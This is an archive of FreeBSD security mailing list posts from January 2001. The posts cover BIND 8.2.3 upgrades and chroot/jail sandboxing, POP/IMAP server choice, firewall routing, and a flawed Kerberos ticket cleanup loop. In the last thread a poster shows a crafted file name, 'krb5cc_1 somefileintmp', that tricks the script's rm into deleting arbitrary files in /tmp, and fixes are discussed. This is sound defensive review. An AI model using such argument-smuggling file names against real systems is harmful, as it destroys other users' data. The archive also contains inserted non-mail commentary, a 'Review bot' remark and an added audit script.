From: Dag-Erling Smorgrav Date: 30 Jan 2001 14:20:13 +0100 In-Reply-To: Kris Kennaway's message of "Mon, 29 Jan 2001 14:33:00 -0800" Message-ID: Lines: 193 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Kris Kennaway writes:
> Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be
> updated tomorrow). Some of the cvsup mirrors may take a little while
> to receive the update though, so be warned. They should all have it in
> an hour or so.

RELENG_3 has been fixed, please follow the procedure below if you're running 2.2.x or 3.x (tested on 3.5-STABLE, should work on 2.2.x but no guarantees):

1) start by updating the following directories to the latest RELENG_3, either using cvsup or using 'cvs update -Pd -rRELENG_3' if you have access to a CVS repository.

     src/contrib/bind
     src/lib/libbind
     src/lib/libisc
     src/libexec/named-xfer
     src/usr.sbin/named
     src/usr.sbin/named.reload
     src/usr.sbin/named.restart
     src/usr.sbin/ndc

   make sure you have src/contrib/bind/port/freebsd/include/port_after.h revision 1.3.2.3 if you're running a pre-IPv6 version of FreeBSD (2.2.x or 3.x).

2) (OPTIONAL) if you are planning to run BIND in a sandbox, apply the following patch to src/libexec/named-xfer/Makefile:
@@ -23,4 +23,6 @@ MAN8= named-xfer.8 +NOSHARED= YES + .include # END OF PATCH

3) in each of the directories listed above *except src/contrib/bind* and *in the order listed*, run the following command:

     make cleandir && make obj && make depend && make && make install

4) restart your name server.

   !!!WARNING!!! If you are running BIND with particular options (e.g. to run it in a chroot or jail) DO NOT USE 'ndc restart' UNLESS YOU ALSO PROVIDE THOSE OPTIONS ON THE NDC COMMAND LINE - e.g. 'ndc restart -t /foo'

   Assuming rc.conf has the right information (which it must have if BIND is to start correctly after a reboot), you can use the following script to restart BIND:

     #!/bin/sh
     if [ -f /etc/defaults/rc.conf ] ; then
         . /etc/defaults/rc.conf
     fi
     if [ -n "${source_rc_confs_defined}" ] ; then
         source_rc_confs
     elif [ -f /etc/rc.conf ] ; then
         . /etc/rc.conf
     else
         echo "Where's your configuration?"
         exit 1
     fi
     killall -KILL named
     ${named_program:-named} ${named_flags}
     # END OF SCRIPT

5) Instructions for running BIND in a chroot sandbox

   a) Make sure your system has a 'bind' user like this:

        bind:*:53:53::0:0:Bind Sandbox:/home/bind:/sbin/nologin

   b) Make sure your system has a 'bind' group like this:

        bind:*:53:

   c) Pick a location for your sandbox; /home/bind is as good a place as any.

   d) Create all necessary directories

        mkdir -p /home/bind/etc/namedb
        mkdir -p /home/bind/usr/libexec
        mkdir -p /home/bind/var/run
        mkdir -p /home/bind/var/tmp

   e) Copy named-xfer into the sandbox

        cp /usr/libexec/named-xfer /home/bind/usr/libexec

      This assumes you built a statically linked named-xfer (see above).

   f) Copy your config files etc. into /home/bind/etc/namedb. If you like to have your master and/or slave zone files in separate subdirectories of etc/namedb, create those; I like to put master zones in etc/namedb/master, slave zones in etc/namedb/slave, and dumps in etc/namedb/db.
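Review bot: the `.include` context line of the named-xfer Makefile hunk has lost its argument (the line in src/libexec/named-xfer/Makefile is `.include <bsd.prog.mk>`, and the angle-bracketed part appears to have been dropped by the archive's extraction), so anyone applying this by hand should patch against the real last line of the Makefile rather than this text. The added `NOSHARED= YES` also carries no comment; it exists only so that the binary copied into the chroot in step 5e runs without ld.so and /usr/lib inside the sandbox, and a one-line comment above it, e.g. `# static: named-xfer is copied into the chroot sandbox`, would keep the next person from removing it as unneeded.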
   You shouldn't need any sandbox-specific magic in your named.conf - the stock config should be fine, though I would recommend specifying a listen address and a query-source. The options section for a simple config, assuming your server's IP address is 192.168.0.1, would look like this:

        options {
                directory "/etc/namedb";
                forwarders {
                        // the usual stuff - your ISP's name servers,
                        // those of a few other large ISPs in your country,
                        // or whatever you like to forward queries to
                };
                listen-on port 53 { 192.168.0.1; };
                query-source address 192.168.0.1 port 53;
        };

   You don't need to listen on 127.0.0.1; just make sure your /etc/resolv.conf points to 192.168.0.1 instead of 127.0.0.1.

   g) Fix permissions:

        chown -R bind:bind /home/bind
        chmod -R o-rwx /home/bind

   h) Set up an extra log socket inside the sandbox so BIND can access syslogd: add "-l /home/bind/var/run/log" to your syslogd_flags in your /etc/rc.conf, and restart syslogd with the correct flags, like this:

        (. /etc/rc.conf ; syslogd ${syslogd_flags})

      Verify that /home/bind/var/run/log exists and is a socket after restarting syslogd.

   i) Set up a symlink to the real ndc socket so ndc will still work:

        ln -fs /home/bind/var/run/ndc /var/run

      You may want to do the same for the named.pid file, though there's no real need to.

   j) Add the right options to named_flags in your /etc/rc.conf - if you followed these instructions to the letter, the right options would be "-ubind -gbind -t/home/bind"

   k) Use the restart script above to start named. Verify that it works. If it doesn't, check /var/log/messages and fix whatever errors it reports.

6) Instructions for running BIND in a jail sandbox

   There are two possibilities here: use the jail(8) command, or patch BIND so it can jail itself. Note that this only works on RELENG_4 and newer, since older FreeBSD versions don't have jail support.
   a) using jail(8): follow the instructions in 5) above, except that your sandbox should contain a statically linked copy of named(8) in usr/sbin, and instead of step j) you should just set named_program in /etc/rc.conf to the following:

        "/usr/sbin/jail /home/bind ns.domain.com 192.168.0.1 /usr/sbin/named"

      you can also set named_flags to "-ubind -gbind", but in that case you need password and group files in your sandbox's etc directory so BIND can figure out which user and group to use.

   b) patching BIND: get the BIND patch from my software page: apply the patch, and follow the instructions provided earlier in this document for rebuilding BIND (you only need to rebuild src/usr.sbin/named). Next, follow the instructions for running BIND in a chroot sandbox, except that in step j) you should use the following options:

        "-ubind -gbind -hns1.domain.com -i192.168.0.1 -j/home/bind"

      There is no need to place a named binary in the sandbox.

That's it, folks!

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 5:28:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F115B37B4EC for ; Tue, 30 Jan 2001 05:28:15 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id OAA20197; Tue, 30 Jan 2001 14:28:14 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: Borja Marcos , freebsd-security@freebsd.org Subject: Re: More bind8 ports problems References: <3A7695CB.7E2F7CBB@sarenet.es> <20010130023131.A50095@xor.obsecurity.org>
From: Dag-Erling Smorgrav Date: 30 Jan 2001 14:28:13 +0100 In-Reply-To: Kris Kennaway's message of "Tue, 30 Jan 2001 02:31:31 -0800" Message-ID: Lines: 31 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Kris Kennaway writes:
> On Tue, Jan 30, 2001 at 11:22:03AM +0100, Borja Marcos wrote:
> > Another problem: I have tried to run named as a "bind"
> > user, but if I restart it with ndc, the new named runs as "root".
> Don't know there.

'ndc restart' restarts named with no arguments, unless you pass them with the 'restart' command:

     # ndc restart -ubind -gbind -t/home/bind

Use the following script instead:

     #!/bin/sh
     if [ -f /etc/defaults/rc.conf ] ; then
         . /etc/defaults/rc.conf
     fi
     if [ -n "${source_rc_confs_defined}" ] ; then
         source_rc_confs
     elif [ -f /etc/rc.conf ] ; then
         . /etc/rc.conf
     else
         echo "Where's your configuration?"
         exit 1
     fi
     killall -KILL named
     ${named_program:-named} ${named_flags}

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 7:10:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from garnet.INS.CWRU.Edu (garnet.INS.CWRU.Edu [129.22.8.233]) by hub.freebsd.org (Postfix) with ESMTP id 0D11037B65D; Tue, 30 Jan 2001 07:09:54 -0800 (PST) Received: from nike.INS.CWRU.Edu (nike.INS.CWRU.Edu [129.22.8.219]) by garnet.INS.CWRU.Edu with SMTP (8.8.8+cwru/CWRU-3.6) id KAA24833; Tue, 30 Jan 2001 10:09:41 -0500 (EST) (from chet@nike.INS.CWRU.Edu) Date: Tue, 30 Jan 2001 10:06:09 -0500
From: Chet Ramey To: roam@orbitel.bg Subject: Re: Bash2 removes SSH_CLIENT from the environment Cc: patrick@netzuno.com, freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, chet@po.cwru.edu Reply-To: chet@po.CWRU.Edu Message-ID: <1010130150609.AA70020.SM@nike.INS.CWRU.Edu> Read-Receipt-To: chet@po.CWRU.Edu MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-In-Reply-To: Message from roam@orbitel.bg of Tue, 30 Jan 2001 10:34:16 +0200 (id <20010130103415.B328@ringworld.oblivion.bg>) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> > However I found that if the login shell of the user is set to bash (version
> > 2.03 or 2.04 at least), this variable is never set. Upon inspection of the
> > code for bash, it appears that bash is explicitly removing the definition
> > of this environment variable. Would anybody have an idea why ???
> >
> > Also the fix to leave SSH_CLIENT defined is trivial, is that something that
> > would be desirable for the bash2 port ?
>
> Huh?

Bash uses the presence of SSH_CLIENT to decide whether or not to run the shell startup files for a non-interactive shell (like it attempts to do for rsh). The problem is that if the variable is exported, subsequent invocations of non-interactive shells will source the startup files. A lot of users find the former behavior desirable, and the latter undesirable. The tradeoff bash makes is to remove the export attribute from SSH_CLIENT if it exists in the shell's initial environment. Users may always export it explicitly.
Chet -- ``The lyf so short, the craft so long to lerne.'' - Chaucer ( ``Discere est Dolere'' -- chet) Chet Ramey, CWRU chet@po.CWRU.Edu http://cnswww.cns.cwru.edu/~chet/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8: 1:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (lc4-lfd11.law5.hotmail.com [216.32.243.33]) by hub.freebsd.org (Postfix) with ESMTP id 6D1F537B503 for ; Tue, 30 Jan 2001 08:01:13 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 30 Jan 2001 08:01:13 -0800 Received: from 192.122.209.42 by www.hotmail.msn.com with HTTP; Tue, 30 Jan 2001 16:01:12 GMT X-Originating-IP: [192.122.209.42] 
From: "Edward W. M." To: freebsd-security@FreeBSD.ORG Subject: POP3 / IMAP security Date: Tue, 30 Jan 2001 08:01:12 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 30 Jan 2001 16:01:13.0137 (UTC) FILETIME=[DE76D210:01C08AD5] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everyone, I apologize in advance if you feel that I should have posted this to questions. I intend to run POP and IMAP services on a new machine, so I need easily deployable secure servers that can be installed from the ports. Cyrus is out of the question for me, I am running that on another box and I just need something more easily deployable for this one. All my users have shell access and log in via ssh, so the bugs in the UW imap server are not that relevant, but still, that is one bug-ridden piece of software and I think it's just a matter of time before another security related bug is discovered. The same goes for popper and as I do not have the time to do the research, I hope to hear from experienced admins out there who have done the research (tee hee :-)) and are willing to share their knowledge and experience. Once I install the pop / imap servers I will allow access to pop and imap from localhost only, allowing users to tunnel to pop / imap through ssh. That takes care of the major threat, but still, there are a few local users that pose a potential threat, so I need proven, secure and easily deployable solutions. Thank you, Edward W. M. 
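The design in the post above (POP and IMAP bound to the loopback address only, users reaching them through ssh tunnels) is only as good as the bind addresses the daemons actually end up with, so the following is a small audit for it. It is an added example, not code from the poster or from any of the servers discussed; it assumes the column layout of FreeBSD's `sockstat -4 -l` output (USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS) and works on a constructed sample listing so it can be run offline.

```shell
#!/bin/sh
# Added example, not code from the original post. Audits a sockstat(1)-style
# listing and flags POP/IMAP listeners that are reachable from outside the
# loopback interface. Assumed: the FreeBSD `sockstat -4 -l` column layout
#   USER COMMAND PID FD PROTO LOCAL_ADDRESS FOREIGN_ADDRESS
# On a live host: sockstat -4 -l | audit_mail_listeners

MAIL_PORTS="110 143 993 995"   # pop3 imap imaps pop3s

# Constructed sample listing; not captured from any real host.
SAMPLE_LISTING='USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     popper     1201  4  tcp4   *:110                 *:*
root     imapd      1202  4  tcp4   127.0.0.1:143         *:*
root     sshd       812   4  tcp4   *:22                  *:*'

# audit_mail_listeners: stdin = listing, stdout = one line per mail listener:
#   <EXPOSED|LOOPBACK> <command> <local address> <user>
# Anything on a mail port that is not bound to 127.0.0.1 (the wildcard "*"
# or a real interface address) is reported as EXPOSED.
audit_mail_listeners() {
    awk -v ports="$MAIL_PORTS" '
    BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
    NR > 1 && $5 ~ /^tcp/ {
        split($6, a, ":"); addr = a[1]; port = a[2]
        if (!(port in want)) next
        status = (addr == "127.0.0.1") ? "LOOPBACK" : "EXPOSED"
        printf "%s %s %s %s\n", status, $2, $6, $1
    }'
}

# exposed_count: stdin = listing, stdout = number of EXPOSED mail listeners
# (grep -c exits 1 on zero matches, which is not an error here)
exposed_count() {
    audit_mail_listeners | grep -c '^EXPOSED' || true
}

# Stand-alone run against the sample: popper on *:110 is flagged, imapd on
# 127.0.0.1:143 passes, sshd is ignored because 22 is not a mail port.
printf '%s\n' "$SAMPLE_LISTING" | audit_mail_listeners
```

On the real box, pipe `sockstat -4 -l` into `audit_mail_listeners` after every daemon or inetd.conf change; a firewall rule on the outside interface denying inbound traffic to those four ports is the belt-and-braces companion, and users then reach the loopback listener with `ssh -L 1110:127.0.0.1:110 mailhost` and an MUA pointed at localhost:1110. Note that this addresses only the network exposure; the local users the post worries about can still talk to the daemon on 127.0.0.1, so the choice of a well-audited server matters independently of this check.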
_________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8:20: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.marketnews.com (mail.marketnews.com [205.183.200.2]) by hub.freebsd.org (Postfix) with ESMTP id C625A37B65D for ; Tue, 30 Jan 2001 08:19:47 -0800 (PST) Received: from mharding (mason@[205.183.200.47]) by mail.marketnews.com (8.11.0/8.9.3) with SMTP id f0UGJau78693 for ; Tue, 30 Jan 2001 11:19:36 -0500 (EST) 
From: "Mason Harding" To: Subject: Revised: My FreeBSD Firewall Date: Tue, 30 Jan 2001 08:14:23 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <980823154.3a762c72329fd@mail.marketnews.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I am now just trying to implement a FreeBSD firewall, say with the IP address of 172.16.5.2, with the router being 172.16.5.1, and the network being 172.16.5.0/24. How can I handle the routing on this? My routing table is basically as such...

     Destination        Gateway            Netif
     default            172.16.5.1         fxp0
     172.15.5           link#1             fxp1
     172.16.5.1         0:0:c:80:f:30      fxp0
     172.15.5.2/32      link#1             fxp0

I can ping 172.16.5.1 with success, but if I try to ping anything past it (on the internet) I get no response. I can also ping anything on the LAN. Am I going about implementing this firewall correctly? Should I not just be adding a static route for 172.16.5.1? Sorry if this made no sense.

Thank you,
Mason

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 8:40:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id CCF9437B491 for ; Tue, 30 Jan 2001 08:40:06 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 30 Jan 2001 08:37:45 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0UGdSR10358; Tue, 30 Jan 2001 08:39:28 -0800 (PST) (envelope-from cjc) Date: Tue, 30 Jan 2001 08:39:28 -0800
From: "Crist J. Clark" To: Dan Langille Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <200101300712.UAA56104@ducky.nz.freebsd.org>; <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <200101301138.AAA64905@ducky.nz.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 12:38:28AM +1300, Dan Langille wrote: > On 30 Jan 2001, at 1:26, Crist J. Clark wrote: > > > > It can't be that simple! > > > > I hate to break it to you (I guess?), but it is. I did it on my > > CURRENT box for testing and it clobbered the old BIND quite nicely. > > Before, > > > > bubbles# ls -l /usr/sbin/named > > -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named > > > > After, > > > > bubbles# !ls > > ls -l /usr/sbin/named > > -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named > > > > Like I said, PREFIX rocks. > > I actually tried: make PREFIX=/usr DESTETC=/etc install > > The only catch was needing to have /etc/name.conf, so I created a > symlink: > > # ln -s /etc/named.conf /etc/namedb/named.conf > > I'll do more testing in the morning.... True, FreeBSD uses, DESTETC= /etc/namedb If you really want to mimic the FreeBSD install, look at the Makefiles in /usr/src/usr.sbin/named. -- Crist J. 
Clark cjclark@alum.mit.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 8:53:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 7533D37B503 for ; Tue, 30 Jan 2001 08:53:08 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id C14A56A904 for ; Tue, 30 Jan 2001 11:53:07 -0500 (EST) Message-ID: <00ba01c08add$32532850$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Subject: bind8.2.3 port Date: Tue, 30 Jan 2001 11:53:40 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

From where can I get the bind8.2.3 port? I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz in ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/

Thanks,
Rossen

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jan 30 9: 4:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id A5A0737B491 for ; Tue, 30 Jan 2001 09:03:50 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 1C1F8BA2B4; Tue, 30 Jan 2001 09:04:21 -0800 (PST) Date: Tue, 30 Jan 2001 09:04:20 -0800
From: Kris Kennaway To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 port Message-ID: <20010130090420.A52164@xor.obsecurity.org> References: <00ba01c08add$32532850$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jI8keyz6grp/JLjh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00ba01c08add$32532850$4c00000a@sage>; from rraykov@sageian.com on Tue, Jan 30, 2001 at 11:53:40AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jI8keyz6grp/JLjh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Tue, Jan 30, 2001 at 11:53:40AM -0500, Rossen Raykov wrote:
> Hi,
>
> From where can I get the bind8.2.3 port?
> I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz in
> ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/

The package hadn't yet been rebuilt (the above URL contains packages, not ports).
Build it yourself for now: cd /usr/ports/net/bind8 && make all install clean Kris --jI8keyz6grp/JLjh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dvQUWry0BWjoQKURAmhfAJ9snx42o7pymlWYWp3KwDNV8mRj2QCfZJIV 8/IQvIa58xIuyOqc7eZ8kvg= =ZQbM -----END PGP SIGNATURE----- --jI8keyz6grp/JLjh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 10: 7:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from web9303.mail.yahoo.com (web9303.mail.yahoo.com [216.136.129.52]) by hub.freebsd.org (Postfix) with SMTP id B705037B4EC for ; Tue, 30 Jan 2001 10:07:17 -0800 (PST) Message-ID: <20010130180717.62674.qmail@web9303.mail.yahoo.com> Received: from [212.253.3.41] by web9303.mail.yahoo.com; Tue, 30 Jan 2001 10:07:17 PST Date: Tue, 30 Jan 2001 10:07:17 -0800 (PST) 
From: Omer Faruk Sen Subject: Re: bind8.2.3 port To: Rossen Raykov Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

You can download that port from www.freshports.org or www.freebsd.org/ports

But I think there is a compilation problem with it. I am not sure, but I have tried to compile that port 4 times with the same source code. It has given me errors every time, and all of them were in a different .c file. Weird, isn't it? And after compiling it, I made a reboot, but the sysctl command and some of my system commands started to give core dumps. I am not sure the bind8.2.3 port is the reason for that; any feedback???

--- Rossen Raykov wrote:
> Hi,
>
> From where I can get bind8.2.3 port?
> I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz
> in
> ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/
>
> Thanks,
>
> Rossen

__________________________________________________ Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/

From owner-freebsd-security Tue Jan 30 10:29:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0BE9A37B491 for ; Tue, 30 Jan 2001 10:29:25 -0800 (PST) Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by mx1.FreeBSD.org (Postfix) with ESMTP id C50776E26F4 for ; Tue, 30 Jan 2001 10:29:23 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!)
by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14NfZc-0000ZD-00; Tue, 30 Jan 2001 11:32:12 -0700 Message-ID: <3A7708AC.8B490984@softweyr.com> Date: Tue, 30 Jan 2001 11:32:12 -0700 
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "Edward W. M." Cc: freebsd-security@FreeBSD.ORG Subject: Re: POP3 / IMAP security References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Edward W. M." wrote: > > Hi everyone, > > I apologize in advance if you feel that I should have posted > this to questions. > > I intend to run POP and IMAP services on a new machine, so I > need easily deployable secure servers that can be installed from > the ports. > > Cyrus is out of the question for me, I am running that on another > box and I just need something more easily deployable for this one. > All my users have shell access and log in via ssh, so the bugs > in the UW imap server are not that relevant, but still, that is > one bug-ridden piece of software and I think it's just a matter > of time before another security related bug is discovered. The > same goes for popper and as I do not have the time to do the > research, I hope to hear from experienced admins out there who have > done the research (tee hee :-)) and are willing to share their > knowledge and experience. Courier. It's GPL, but it seems reliable. I'm learning quite a bit more about it right now, working on an authentication module to work with our user database (stored in PostgreSQL). Courier works well with either BSD-style mailboxes or Maildirs. We use it in conjunction with Qmail, though I am experimenting with Cyrus and Postfix as well. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 10:44: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id E329737B69D for ; Tue, 30 Jan 2001 10:43:43 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id KAA43289; Tue, 30 Jan 2001 10:43:50 -0800 (PST) (envelope-from root@noops.org) Date: Tue, 30 Jan 2001 10:43:50 -0800 (PST) 
From: Thomas Cannon To: Mason Harding Cc: freebsd-security@FreeBSD.ORG Subject: Re: Revised: My FreeBSD Firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I can ping 172.16.5.1 with success, but if I try to ping anything past it(on > the internet) I get no response. I can also ping anything on the LAN. Am I Can you ping the other interface of that router? Is it passing packets? It sounds like your basic networking on your FBSD machine is okay, but that the router isn't routing. From the router can you get to the internet? -tcannon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11: 6:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (sproxy.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 624B237B6AD for ; Tue, 30 Jan 2001 11:06:35 -0800 (PST) Received: (qmail 19521 invoked by uid 0); 30 Jan 2001 19:06:33 -0000 Received: from p3ee21603.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.3) by mail.gmx.net (mp016-rz3) with SMTP; 30 Jan 2001 19:06:33 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA12277 for freebsd-security@freebsd.org; Tue, 30 Jan 2001 19:50:57 +0100 Date: Tue, 30 Jan 2001 19:50:56 +0100 
From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: cvs commit: src/usr.bin/login login.c Message-ID: <20010130195056.C253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <7897.980850042@axl.fw.uunet.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <7897.980850042@axl.fw.uunet.co.za>; from sheldonh@uunet.co.za on Tue, Jan 30, 2001 at 12:20:42PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, Jan 30, 2001 at 12:20 +0200, Sheldon Hearn wrote:
>
> On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote:
>
> > > # Destroy all stale Kerberos5 tickets
> > > #
> > > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do
> > >     rm -f $i
> > > done
> >
> > and now you can delete any file in /tmp.
> >
> > touch 'krb5cc_1 somefileintmp' and wait.
>
> Well spotted.
>
> find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \;
>
> I don't use -delete because it's not portable.

What about the -print0 option and xargs(1)? Is it as portable as the above construction? Since this would result in less load (*much* fewer exec'ed processes). The "The xargs utility is expected to be IEEE Std 1003.2 (``POSIX.2'') compliant." part of `man xargs` gives me hope ...

find /tmp -name 'krb5cc_*' -ctime +1 -print0 | xargs -0 rm -f

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- If you don't understand or are scared by any of the above ask your parents or an adult to help you.
